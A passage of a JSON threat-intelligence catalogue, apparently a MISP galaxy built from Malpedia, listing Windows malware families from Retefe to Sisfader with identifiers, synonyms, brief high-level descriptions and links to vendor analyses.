PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", "https://github.com/cocaman/retefe", "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://www.govcert.admin.ch/blog/35/reversing-retefe", "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/" ], "synonyms": [ "Tsukuba", "Werdlod" ], "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", "value": "Retefe (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", "https://isc.sans.edu/diary/rss/22590", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/" ], "synonyms": [ "Revetrat" ], "type": [] }, "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", "value": "Revenge RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/" ], "synonyms": [], "type": [] }, "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", "value": "RGDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor", "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] }, "uuid": "2639b71e-1bf1-4cd2-8fa2-9498e893ef3f", "value": "Rifdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", "value": "Rikamanu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2011/Edwards-Nazario-VB2011.pdf" ], "synonyms": [], "type": [] }, "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", "value": "Rincux" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" ], "synonyms": [], "type": [] }, "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", "value": "Ripper ATM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" ], "synonyms": [ "yellowalbatross" ], "type": [] }, "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", "value": "rock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" ], "synonyms": [], "type": [] }, "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", "value": "Rockloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" ], "synonyms": [], "type": [] }, "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", "value": "Rofin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" ], "synonyms": [], "type": [] }, "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", "value": "Rokku" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/", "https://www.youtube.com/watch?v=uoBQE5s2ba4", "http://v3lo.tistory.com/24", "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/" ], "synonyms": [], "type": [] }, "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", "value": "RokRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", "http://blogs.cisco.com/security/talos/rombertik" ], "synonyms": [ "CarbonGrabber" ], "type": [] }, "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", "value": "Rombertik" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" ], "synonyms": [], "type": [] }, "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", "value": "Romeo(Alfa,Bravo, ...)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" ], "synonyms": [], "type": [] }, "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", "value": "Roopirs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" ], "synonyms": [], "type": [] }, "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", "value": "Roseam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" ], "synonyms": [], "type": [] }, "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", "value": "Rover" }, { "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" ], "synonyms": [ "BkLoader", "Cidox", "Mayachok" ], "type": [] }, "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", "value": "Rovnix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", "value": "RoyalCli" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", "value": "Royal DNS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" ], "synonyms": [], "type": [] }, "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", "value": "Rozena" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" ], "synonyms": [], "type": [] }, "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", "value": "RTM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" ], "synonyms": [], "type": [] }, "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", "value": "rtpos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" ], "synonyms": [], "type": [] }, "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", "value": "Ruckguv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" ], "synonyms": [], "type": [] }, "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", "value": "Rumish" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" ], "synonyms": [], "type": [] }, "uuid": "b746a645-5974-44db-a811-a024214b7fba", "value": "running_rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" ], "synonyms": [ "RCSU" ], "type": [] }, "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", "value": "Rurktar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", "https://www.secureworks.com/blog/research-21041", "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/" ], "synonyms": [], "type": [] }, "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", "value": "Rustock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/" ], "synonyms": [], "type": [] }, "uuid": "62c79940-184e-4b8d-9237-35434bb79678", "value": "Ryuk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", "http://malware-traffic-analysis.net/2017/10/13/index.html", "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/" ], "synonyms": [ "Saga" ], "type": [] }, "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", "value": "SAGE" }, { "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", "https://www.secureworks.com/research/sakula-malware-family" ], "synonyms": [ "Sakurel" ], "type": [] }, "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", "value": "Sakula RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" ], "synonyms": [], "type": [] }, "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", "value": "Salgorea" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" ], "synonyms": [], "type": [] }, "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", "value": "Sality" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", "http://blog.talosintel.com/2016/03/samsam-ransomware.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" ], "synonyms": [], "type": [] }, "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", "value": "SamSam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" ], "synonyms": [ "Daws" ], "type": [] }, "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", "value": "Sanny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" ], "synonyms": [ "Hussarini" ], "type": [] }, "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", "value": "Sarhust" }, { "description": "Sasfis acts mostly as a downloader that has been observed to download Asprox and FakeAV. According to a VirusBulletin article from 2012, it is likely authored by the same group as SmokeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/", "https://www.symantec.com/security-center/writeup/2010-020210-5440-99", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/", "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign" ], "synonyms": [ "Oficla" ], "type": [] }, "uuid": "4c4ceb45-b326-45aa-8f1a-1229e90c78b4", "value": "Sasfis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" ], "synonyms": [], "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", "value": "Satan Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", "https://www.cylance.com/threat-spotlight-satan-raas" ], "synonyms": [], "type": [] }, "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", "value": "Satana" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" ], "synonyms": [], "type": [] }, "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", "value": "Sathurbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" ], "synonyms": [], "type": [] }, "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", "value": "ScanPOS" }, { "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", "https://github.com/vithakur/schneiken" ], "synonyms": [], "type": [] }, "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", "value": "Schneiken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" ], "synonyms": [], "type": [] }, "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", "value": "Scote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", "https://twitter.com/struppigel/status/791535679905927168" ], "synonyms": [], "type": [] }, "uuid": "9803b201-28e5-40c5-b661-c1a191388072", "value": "ScreenLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "synonyms": [], "type": [] }, "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", "value": "SeaDaddy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", "value": "SeaSalt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", "https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/" ], "synonyms": [], "type": [] }, "uuid": "272268bb-2715-476b-a121-49142581c559", "value": "SeDll" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" ], "synonyms": [ "azzy", "eviltoss" ], "type": [] }, "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", "value": "Sedreco" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed" ], "synonyms": [ "carberplike", "downrage", "jhuhugit", "jkeyskw" ], "type": [] }, "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", "value": "Seduploader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" ], "synonyms": [], "type": [] }, "uuid": "503ca41c-7788-477c-869b-ac530f20c490", "value": "SendSafe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" ], "synonyms": [], "type": [] }, "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", "value": "Serpico" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", "https://securelist.com/shadowpad-in-corporate-networks/81432/", "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" ], "synonyms": [ "XShellGhost" ], "type": [] }, "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", "value": "ShadowPad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" ], "synonyms": [], "type": [] }, "uuid": "f64683c8-50ab-42c0-8b90-881598906528", "value": "Shakti" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" ], "synonyms": [], "type": [] }, "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", "value": "SHAPESHIFT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [ "remotecmd" ], "type": [] }, "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", "value": "shareip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", "https://eromang.zataz.com/tag/agentbase-exe/", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" ], "synonyms": [ "Bitrep" ], "type": [] }, "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", "value": "SHARPKNOT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", "https://twitter.com/JaromirHorejsi/status/813726714228604928" ], "synonyms": [], "type": [] }, "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", "value": "ShellLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" ], "synonyms": [], "type": [] }, "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", "value": "Shifu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" ], "synonyms": [], "type": [] }, "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", "value": "Shim RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", "http://www.nyxbone.com/malware/chineseRansom.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/" ], "synonyms": [], "type": [] }, "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", "value": "Shujin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" ], "synonyms": [], "type": [] }, "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", "value": "Shurl0ckr" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/", "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw" ], "synonyms": [ "Caphaw" ], "type": [] }, "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", "value": "Shylock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", "https://s.tencent.com/research/report/479.html" ], "synonyms": [], "type": [] }, "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", "value": "SideWinder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" ], "synonyms": [ "Destover" ], "type": [] }, "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", "value": "Sierra(Alfa,Bravo, ...)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" ], "synonyms": [], "type": [] }, "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", "value": "Siggen6" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "http://www.intezer.com/silenceofthemoles/", "https://securelist.com/the-silence/83009/", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [ "TrueBot" ], "type": [] }, "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", "value": "Silence" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm", "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html" ], "synonyms": [], "type": [] }, "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", "value": "Silon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" ], "synonyms": [], "type": [] }, "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", "value": "Siluhdur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", "https://secrary.com/ReversingMalware/iBank/" ], "synonyms": [ "iBank" ], "type": [] }, "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", "value": "Simda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", "https://en.wikipedia.org/wiki/Torpig", "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/" ], "synonyms": [ "Anserin", "Mebroot", "Quarian", "Theola", "Torpig" ], "type": [] }, "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", "value": "Sinowal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", 